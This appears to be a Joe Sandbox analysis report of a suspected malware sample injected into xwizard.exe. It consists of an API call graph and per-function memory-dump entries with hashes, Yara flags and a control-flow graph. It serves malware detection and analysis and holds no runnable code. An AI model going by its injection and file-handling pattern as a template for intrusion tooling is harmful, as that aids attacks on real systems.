28cc6c6 98730->98731 98732 28cc6c0 98730->98732 98733 28cb6f0 RtlAllocateHeap 98731->98733 98732->98711 98734 28cc6ec 98733->98734 98734->98711 98736 28cc750 98735->98736 98737 28cb6f0 RtlAllocateHeap 98736->98737 98740 28cc7ad 98736->98740 98738 28cc78a 98737->98738 98739 28cb610 RtlFreeHeap 98738->98739 98739->98740 98740->98716 98759 28c9840 98741->98759 98745 28c5b22 98744->98745 98747 28c5b33 98745->98747 98764 28b7b10 98745->98764 98747->98722 98749 28b8353 98748->98749 98769 28c8b10 98749->98769 98751 28b837e 98751->98718 98755 28c9720 98752->98755 98754 28cb5be 98754->98729 98756 28c97af 98755->98756 98758 28c9748 98755->98758 98757 28c97c5 NtAllocateVirtualMemory 98756->98757 98757->98754 98758->98754 98760 28c985d 98759->98760 98763 47d2c70 LdrInitializeThunk 98760->98763 98761 28b0b3f 98761->98722 98763->98761 98768 28b7a40 98764->98768 98765 28b0b20 LdrInitializeThunk 98766 28b7b01 98765->98766 98766->98747 98767 28b7b41 98768->98764 98768->98765 98768->98767 98770 28c8b8b 98769->98770 98772 28c8b3b 98769->98772 98774 47d2dd0 LdrInitializeThunk 98770->98774 98771 28c8bb0 98771->98751 98772->98751 98774->98771 99027 28ab850 99028 28cb590 NtAllocateVirtualMemory 99027->99028 99029 28acec1 99028->99029 98775 28b7010 98776 28b703a 98775->98776 98779 28b8170 98776->98779 98778 28b7061 98780 28b818d 98779->98780 98786 28c8d00 98780->98786 98782 28b81dd 98783 28b81e4 98782->98783 98791 28c8de0 98782->98791 98783->98778 98785 28b820d 98785->98778 98787 28c8d95 98786->98787 98788 28c8d28 98786->98788 98796 47d2f30 LdrInitializeThunk 98787->98796 98788->98782 98789 28c8dce 98789->98782 98792 28c8e87 98791->98792 98794 28c8e08 98791->98794 98797 47d2d10 LdrInitializeThunk 98792->98797 98793 28c8ecc 98793->98785 98794->98785 98796->98789 98797->98793 98798 28b7590 98799 28b7602 98798->98799 98800 28b75a8 98798->98800 98800->98799 98802 28bb4d0 98800->98802 98803 28bb4f6 98802->98803 98804 28bb726 98803->98804 98829 28c99c0 98803->98829 98804->98799 98806 28bb572 98806->98804 98807 28cc7e0 2 API calls 98806->98807 98808 28bb58e 98807->98808 98808->98804 98809 28bb662 98808->98809 98810 28c8c10 LdrInitializeThunk 98808->98810 98811 28b5db0 LdrInitializeThunk 98809->98811 98813 28bb67e 98809->98813 98812 28bb5f0 98810->98812 98811->98813 98812->98809 98817 28bb5f9 98812->98817 98818 28bb70e 98813->98818 98835 28c8780 98813->98835 98814 28bb64a 98815 28b8340 LdrInitializeThunk 98814->98815 98819 28bb658 98815->98819 98816 28bb628 98850 28c49d0 LdrInitializeThunk 98816->98850 98817->98804 98817->98814 98817->98816 98832 28b5db0 98817->98832 98820 28b8340 LdrInitializeThunk 98818->98820 98819->98799 98824 28bb71c 98820->98824 98824->98799 98825 28bb6e5 98840 28c8830 98825->98840 98827 28bb6ff 98845 28c8990 98827->98845 98830 28c99dd 98829->98830 98831 28c99ee CreateProcessInternalW 98830->98831 98831->98806 98833 28c8de0 LdrInitializeThunk 98832->98833 98834 28b5dee 98833->98834 98834->98816 98836 28c87fa 98835->98836 98838 28c87ab 98835->98838 98851 47d39b0 LdrInitializeThunk 98836->98851 98837 28c881f 98837->98825 98838->98825 98841 28c88a7 98840->98841 98843 28c8858 98840->98843 98852 47d4340 LdrInitializeThunk 98841->98852 98842 28c88cc 98842->98827 98843->98827 98846 28c8a0a 98845->98846 98848 28c89bb 98845->98848 98853 47d2fb0 LdrInitializeThunk 98846->98853 98847 28c8a2f 98847->98818 98848->98818 98850->98814 98851->98837 98852->98842 98853->98847 99030 28bfa50 99031 28bfab4 99030->99031 99032 28b6540 2 API calls 99031->99032 99034 28bfbe7 99032->99034 99033 28bfbee 99034->99033 99059 28b6650 99034->99059 99036 28bfd93 99037 28bfc6a 99037->99036 99038 28bfda2 99037->99038 99063 28bf830 99037->99063 99039 28c95c0 NtClose 99038->99039 99041 28bfdac 99039->99041 99042 28bfca6 99042->99038 99043 28bfcb1 99042->99043 99044 28cb6f0 RtlAllocateHeap 99043->99044 99045 28bfcda 99044->99045 99046 28bfcf9 99045->99046 99047 28bfce3 99045->99047 99072 28bf720 CoInitialize 99046->99072 99049 28c95c0 NtClose 99047->99049 99051 28bfced 99049->99051 99050 28bfd07 99075 28c9090 99050->99075 99053 28bfd82 99054 28c95c0 NtClose 99053->99054 99055 28bfd8c 99054->99055 99057 28cb610 RtlFreeHeap 99055->99057 99056 28bfd25 99056->99053 99058 28c9090 LdrInitializeThunk 99056->99058 99057->99036 99058->99056 99060 28b6675 99059->99060 99079 28c8f20 99060->99079 99064 28bf84c 99063->99064 99065 28b47f0 LdrLoadDll 99064->99065 99067 28bf86a 99065->99067 99066 28bf873 99066->99042 99067->99066 99068 28b47f0 LdrLoadDll 99067->99068 99069 28bf93e 99068->99069 99070 28b47f0 LdrLoadDll 99069->99070 99071 28bf99b 99069->99071 99070->99071 99071->99042 99074 28bf785 99072->99074 99073 28bf81b CoUninitialize 99073->99050 99074->99073 99076 28c90aa 99075->99076 99084 47d2ba0 LdrInitializeThunk 99076->99084 99077 28c90da 99077->99056 99080 28c8f3a 99079->99080 99083 47d2c60 LdrInitializeThunk 99080->99083 99081 28b66e9 99081->99037 99083->99081 99084->99077 98854 28cc710 98855 28cb610 RtlFreeHeap 98854->98855 98856 28cc725 98855->98856 99085 28c92d0 99086 28c9381 99085->99086 99088 28c92fc 99085->99088 99087 28c9397 NtCreateFile 99086->99087 99094 28b10eb 99095 28b10f3 PostThreadMessageW 99094->99095 99096 28b10ff 99094->99096 99095->99096 99097 28b9e61 99098 28b9e6f 99097->99098 99099 28b9e76 99098->99099 99100 28cb610 RtlFreeHeap 99098->99100 99100->99099 98859 28bafa0 98864 28bacb0 98859->98864 98861 28bafad 98878 28ba920 98861->98878 98863 28bafc9 98865 28bacd5 98864->98865 98889 28b85b0 98865->98889 98868 28bae23 98868->98861 98870 28bae3a 98870->98861 98871 28bae31 98871->98870 98873 28baf27 98871->98873 98908 28ba370 98871->98908 98875 28baf8a 98873->98875 98917 28ba6e0 98873->98917 98876 28cb610 RtlFreeHeap 98875->98876 98877 28baf91 98876->98877 98877->98861 98879 28ba936 98878->98879 98882 28ba941 98878->98882 98880 28cb6f0 RtlAllocateHeap 98879->98880 98880->98882 98881 28ba968 98881->98863 98882->98881 98883 28b85b0 GetFileAttributesW 98882->98883 98884 28bac82 98882->98884 98887 28ba370 RtlFreeHeap 98882->98887 98888 28ba6e0 RtlFreeHeap 98882->98888 98883->98882 98885 28bac9b 98884->98885 98886 28cb610 RtlFreeHeap 98884->98886 98885->98863 98886->98885 98887->98882 98888->98882 98890 28b85d1 98889->98890 98891 28b85d8 GetFileAttributesW 98890->98891 98892 28b85e3 98890->98892 98891->98892 98892->98868 98893 28c35a0 98892->98893 98894 28c35ae 98893->98894 98895 28c35b5 98893->98895 98894->98871 98896 28b47f0 LdrLoadDll 98895->98896 98897 28c35ea 98896->98897 98898 28c35f9 98897->98898 98921 28c3060 LdrLoadDll 98897->98921 98900 28cb6f0 RtlAllocateHeap 98898->98900 98904 28c37a7 98898->98904 98901 28c3612 98900->98901 98902 28c379d 98901->98902 98903 28c362e 98901->98903 98901->98904 98902->98904 98905 28cb610 RtlFreeHeap 98902->98905 98903->98904 98906 28cb610 RtlFreeHeap 98903->98906 98904->98871 98905->98904 98907 28c3791 98906->98907 98907->98871 98909 28ba396 98908->98909 98922 28bdda0 98909->98922 98911 28ba408 98913 28ba590 98911->98913 98914 28ba426 98911->98914 98912 28ba575 98912->98871 98913->98912 98916 28ba230 RtlFreeHeap 98913->98916 98914->98912 98927 28ba230 98914->98927 98916->98913 98918 28ba706 98917->98918 98919 28bdda0 RtlFreeHeap 98918->98919 98920 28ba78d 98919->98920 98920->98873 98921->98898 98924 28bddc4 98922->98924 98923 28bddd1 98923->98911 98924->98923 98925 28cb610 RtlFreeHeap 98924->98925 98926 28bde14 98925->98926 98926->98911 98928 28ba24d 98927->98928 98931 28bde30 98928->98931 98930 28ba353 98930->98914 98933 28bde54 98931->98933 98932 28bdefe 98932->98930 98933->98932 98934 28cb610 RtlFreeHeap 98933->98934 98934->98932 98935 28c9520 98936 28c9548 98935->98936 98937 28c9591 98935->98937 98938 28c95a7 NtDeleteFile 98937->98938 99106 28b8a67 99107 28b8a6a 99106->99107 99108 28b8a21 99107->99108 99110 28b7330 99107->99110 99111 28b7346 99110->99111 99113 28b737f 99110->99113 99111->99113 99114 28b71a0 LdrLoadDll 99111->99114 99113->99108 99114->99113 98939 47d2ad0 LdrInitializeThunk 98940 28a9e30 98941 28a9e3f 98940->98941 98942 28a9e80 98941->98942 98943 28a9e6d CreateThread 98941->98943 98944 28b5e30 98945 28b8340 LdrInitializeThunk 98944->98945 98946 28b5e60 98944->98946 98945->98946 98949 28b82c0 98946->98949 98948 28b5e85 98950 28b8304 98949->98950 98951 28b8325 98950->98951 98956 28c88e0 98950->98956 98951->98948 98953 28b8315 98954 28b8331 98953->98954 98955 28c95c0 NtClose 98953->98955 98954->98948 98955->98951 98957 28c895a 98956->98957 98959 28c890b 98956->98959 98961 47d4650 LdrInitializeThunk 98957->98961 98958 28c897f 98958->98953 98959->98953 98961->98958 98962 28b73b0 98963 28b73cc 98962->98963 98971 28b741f 98962->98971 98965 28c95c0 NtClose 98963->98965 98963->98971 98964 28b7551 98966 28b73e7 98965->98966 98972 28b67d0 NtClose LdrInitializeThunk LdrInitializeThunk 98966->98972 98968 28b7531 98968->98964 98974 28b69a0 NtClose LdrInitializeThunk LdrInitializeThunk 98968->98974 98971->98964 98973 28b67d0 NtClose LdrInitializeThunk LdrInitializeThunk 98971->98973 98972->98971 98973->98968 98974->98964 98975 28c9430 98976 28c945b 98975->98976 98977 28c94d4 98975->98977 98978 28c94ea NtReadFile 98977->98978 98979 28c0330 98980 28c0353 98979->98980 98981 28b47f0 LdrLoadDll 98980->98981 98982 28c0377 98981->98982 99120 28c1970 99121 28c198c 99120->99121 99122 28c19c8 99121->99122 99123 28c19b4 99121->99123 99125 28c95c0 NtClose 99122->99125 99124 28c95c0 NtClose 99123->99124 99126 28c19bd 99124->99126 99127 28c19d1 99125->99127 99130 28cb730 RtlAllocateHeap 99127->99130 99129 28c19dc 99130->99129

                                                                                      Executed Functions

                                                                                      Function 028A9E90 Relevance: 41.7, Strings: 33, Instructions: 408COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 13 28a9e90-28aa265 14 28aa276-28aa27f 13->14 15 28aa267-28aa270 13->15 16 28aa281-28aa293 14->16 17 28aa295-28aa2a1 14->17 15->14 16->15 18 28aa2a3-28aa2be 17->18 19 28aa2c0-28aa2c7 17->19 18->17 20 28aa2c9-28aa2ec 19->20 21 28aa2ee 19->21 20->19 22 28aa2f5-28aa2fc 21->22 23 28aa32e 22->23 24 28aa2fe-28aa32c 22->24 25 28aa335-28aa33c 23->25 24->22 26 28aa33e-28aa354 25->26 27 28aa361-28aa372 25->27 28 28aa35f 26->28 29 28aa356-28aa35c 26->29 30 28aa383-28aa38f 27->30 28->25 29->28 31 28aa3b1-28aa3ba 30->31 32 28aa391-28aa3a1 30->32 33 28aa3c0-28aa3c3 31->33 34 28aa5e1-28aa5eb 31->34 35 28aa3af 32->35 36 28aa3a3-28aa3ac 32->36 37 28aa3c9-28aa3d5 33->37 38 28aa5fc-28aa605 34->38 35->30 36->35 40 28aa3d7-28aa3f2 37->40 41 28aa3f4-28aa3fe 37->41 42 28aa623-28aa62a 38->42 43 28aa607-28aa613 38->43 40->37 44 28aa40f-28aa41b 41->44 47 28aa6b9-28aa6d2 42->47 48 28aa630-28aa63a 42->48 45 28aa621 43->45 46 28aa615-28aa61b 43->46 49 28aa42d-28aa43c 44->49 50 28aa41d-28aa423 44->50 45->38 46->45 47->47 52 28aa6d4-28aa6de 47->52 53 28aa64b-28aa657 48->53 58 28aa442-28aa449 49->58 59 28aa4f5-28aa4ff 49->59 56 28aa42b 50->56 57 28aa425-28aa428 50->57 60 28aa6ef-28aa6fb 52->60 54 28aa659-28aa662 53->54 55 28aa66f call 28cb290 53->55 61 28aa66d 54->61 62 28aa664-28aa66a 54->62 72 28aa674-28aa67e 55->72 56->44 57->56 65 28aa44b-28aa461 58->65 66 28aa46e-28aa478 58->66 67 28aa510-28aa519 59->67 68 28aa708-28aa712 60->68 69 28aa6fd-28aa706 60->69 71 28aa63c-28aa645 61->71 62->61 73 28aa46c 65->73 74 28aa463-28aa469 65->74 77 28aa489-28aa495 66->77 75 28aa51b-28aa52d 67->75 76 28aa52f-28aa539 67->76 69->60 71->53 80 28aa68f-28aa69b 72->80 73->58 74->73 75->67 82 28aa54a-28aa556 76->82 78 28aa4ac-28aa4b6 77->78 79 28aa497-28aa4aa 77->79 85 28aa4c7-28aa4d0 78->85 79->77 80->47 87 28aa69d-28aa6a9 80->87 83 28aa558-28aa565 82->83 84 28aa567-28aa56e 82->84 83->82 89 28aa570-28aa5a3 84->89 90 28aa5a5-28aa5a9 84->90 91 28aa4d2-28aa4de 85->91 92 28aa4e0-28aa4e4 85->92 93 28aa6ab-28aa6b1 87->93 94 28aa6b7 87->94 89->84 95 28aa5ab-28aa5d0 90->95 96 28aa5d2-28aa5dc 90->96 91->85 97 28aa4f0 92->97 98 28aa4e6-28aa4ed 92->98 93->94 94->80 95->90 96->31 97->34 98->97
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: +$&$+$-$3f$4$98$;$=e$@$DW$L@$M_$T$U$U$X$X)$ZY$[L$^6$b$b$c$i&$l$m$m$mI$x$$}$b$o
                                                                                      • API String ID: 0-533882937
                                                                                      • Opcode ID: fab792334ad35209d5fd4ed1774f3f63abe4a3e2a37dca734dafb6f9c12b4a4d
                                                                                      • Instruction ID: 0f884c5e85d626b374ab0961b721e12e4625128302779cab2224792da31c1b94
                                                                                      • Opcode Fuzzy Hash: fab792334ad35209d5fd4ed1774f3f63abe4a3e2a37dca734dafb6f9c12b4a4d
                                                                                      • Instruction Fuzzy Hash: BA329FB4E05228CFEB68CF44C8947DDBBB2BB45308F1081D9D149AB681DBB55AC9CF45
                                                                                      Function 028BC840 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 028BC924
                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 028BC95F
                                                                                      • FindClose.KERNELBASE(?), ref: 028BC96A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: bebfee3e0a1d94693371a6b2578ecd7aa2155f958ae673e9681450b941bfa544
                                                                                      • Instruction ID: 20fc8553f012cf99793c65f40162a65c968c183a6afb5184e7629db9f4b62b5a
                                                                                      • Opcode Fuzzy Hash: bebfee3e0a1d94693371a6b2578ecd7aa2155f958ae673e9681450b941bfa544
                                                                                      • Instruction Fuzzy Hash: EA31AE7A9003087BEB61DB64CC85FEF777DAF44B05F14445DB908E6280DBB0AA848BA1
                                                                                      Function 04ABF0A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtQueryInformationProcess.NTDLL ref: 04ABF0A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108672426.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4ab0000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcessQuery
                                                                                      • String ID: 2
                                                                                      • API String ID: 1778838933-450215437
                                                                                      • Opcode ID: 8c5844af1c5088e5e7996241b11e056d8a2a29e56f05093f987362b00b987849
                                                                                      • Instruction ID: 2bb6f74935f8c30e950ec7877dbe6a83a672d5ee44cd8a5d2ee268027552d143
                                                                                      • Opcode Fuzzy Hash: 8c5844af1c5088e5e7996241b11e056d8a2a29e56f05093f987362b00b987849
                                                                                      • Instruction Fuzzy Hash: E6210F7711A796ABDB020F74A8842E07FBA9F43A64B1C449ED6C08F357C222A41BD3C1
                                                                                      Function 028C92D0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(?,?,?,2EC3667A,?,?,?,?,?,?,?), ref: 028C93C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 0ef41e7afe924bf652ab708745801da30b8d52ea577ff686edb2d7da9f9e776a
                                                                                      • Instruction ID: 2ba718885183cd2e2db7b8cb5fe800390b95753a85d9edee574fa6bcab33fa2f
                                                                                      • Opcode Fuzzy Hash: 0ef41e7afe924bf652ab708745801da30b8d52ea577ff686edb2d7da9f9e776a
                                                                                      • Instruction Fuzzy Hash: A431BAB9A00648AFDB14DF99D881EDE77B9AF8C704F108119F919A7340D770A851CFA5
                                                                                      Function 028C9430 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(?,?,?,2EC3667A,?,?,?,?,?), ref: 028C9513
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: ad266ff50bd68b21b571e8c3bc2c9e970010c235041cbe2ecf846c778cb5668a
                                                                                      • Instruction ID: 2f50ac832976db477b4d4e6a31e7e540be38a09c122ad21a925d09a81c8188a4
                                                                                      • Opcode Fuzzy Hash: ad266ff50bd68b21b571e8c3bc2c9e970010c235041cbe2ecf846c778cb5668a
                                                                                      • Instruction Fuzzy Hash: 9031CAB9A00648AFDB14DF98D881EDFB7B9EF88714F108219F958A7240D770A911CFA5
                                                                                      Function 028C9720 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(028B207E,?,028C81FF,2EC3667A,00000004,00003000,?,?,?,?,?,028C81FF,028B207E), ref: 028C97E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: ef63b65d45bd76397b2e572c24b7f21ef49f5d3eebc40d442f59e95fd419acf5
                                                                                      • Instruction ID: 337bd06e9719369ed66b5ac50e305bbe6007be04b87035eed48193f5b67c2480
                                                                                      • Opcode Fuzzy Hash: ef63b65d45bd76397b2e572c24b7f21ef49f5d3eebc40d442f59e95fd419acf5
                                                                                      • Instruction Fuzzy Hash: C021FCB9A00608AFDB14DF98DC41EAF77B9EF88710F20851DF918A7240D770A951CFA5
                                                                                      Function 028C9520 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: d675a746fab8c04bdc7a4cc8700e9d332d4f6330f11bff12e3810a0f30c32112
                                                                                      • Instruction ID: 7170ccea80b8fa465b5b0bbcd28f3c0f69a2d9c86b6069ebd75133d5547f7445
                                                                                      • Opcode Fuzzy Hash: d675a746fab8c04bdc7a4cc8700e9d332d4f6330f11bff12e3810a0f30c32112
                                                                                      • Instruction Fuzzy Hash: 8411A0796006086FE620EB68CC41FAFB77DDF85714F20814DFA58A7280DB71B9018BE6
                                                                                      Function 028C95C0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028C95F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: b128fb59003eb0adba234b6788b47a4bfe4ce5fdf048b5cfc933ca3de64206b9
                                                                                      • Instruction ID: f8f50095687ed14520f4328361faed8bf0587acd05ba04e5509cfcbbe3816185
                                                                                      • Opcode Fuzzy Hash: b128fb59003eb0adba234b6788b47a4bfe4ce5fdf048b5cfc933ca3de64206b9
                                                                                      • Instruction Fuzzy Hash: F8E04F3E2002047BD620EA59CC00F977B6DDFC6714F414415FA49A7140CA70B90186E5
                                                                                      Function 047D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                      • Instruction ID: 09b50227317fcc0b00ceb69003c66df74e199cd130a21333526ad171af365a19
                                                                                      • Opcode Fuzzy Hash: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                      • Instruction Fuzzy Hash: 889002616015004261507159480441660059BE5305396C225A0555670C8618D955A26A
                                                                                      Function 047D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                      • Instruction ID: 3a088205638b0d737d516f981772ec1ee5442226376222bcfb3841d772319372
                                                                                      • Opcode Fuzzy Hash: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                      • Instruction Fuzzy Hash: BD90023160580012B1507159488455640059BE4305B56C121E0425674C8A14DA566362
                                                                                      Function 047D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                      • Instruction ID: e954dc9a62869d5acce5c8a5faf8ca377f8c6780586c1450130cb14759bf2726
                                                                                      • Opcode Fuzzy Hash: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                      • Instruction Fuzzy Hash: 8F90023120148802F1207159840475A00058BD4305F5AC521A4425778D8695D9917122
                                                                                      Function 047D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                      • Instruction ID: 2ebf845620946ae95afda4dce2bef4df7a94836508425cd97327b55d42969960
                                                                                      • Opcode Fuzzy Hash: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                      • Instruction Fuzzy Hash: 9A90023120140842F11071594404B5600058BE4305F56C126A0125774D8615D9517522
                                                                                      Function 047D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                      • Instruction ID: c99258c2b026cc0c6a7741ab432a7e37724669227056482998b67190fc2d6e4c
                                                                                      • Opcode Fuzzy Hash: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
